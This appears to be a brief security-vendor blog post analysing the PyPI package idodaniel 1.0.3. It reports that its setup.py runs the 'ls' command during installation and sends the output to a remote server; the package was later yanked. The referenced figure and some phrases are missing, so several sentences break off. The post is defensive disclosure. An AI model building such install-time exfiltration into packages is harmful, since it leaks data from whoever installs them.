Our static analysis module flagged package idodaniel==1.0.3 as suspicious. So we decided to take a deeper look at the code, particularly the statements that were flagged by our technology as "risky". Upon further review we found that the package is indeed fishy! Here we discuss our findings.
Our technology-generated report points out a number of "risky" attributes in this package:
- last release was in Nov, 2018 (i.e., abandonware),
- homepage points to Google, and
- setup.py uses
Fig 1 shows an excerpt from setup.py file.
Since setup.py contains the code that is executed immediately upon installation of a package, it is clear that the package trying to communicate with a server during the installation process. As seen from Fig 1, it first executes
ls command in the background as a separate process and leak its output to a server over insecure
We reported our findings to PyPI maintainers, and they have yanked this package as of Jan, 2022.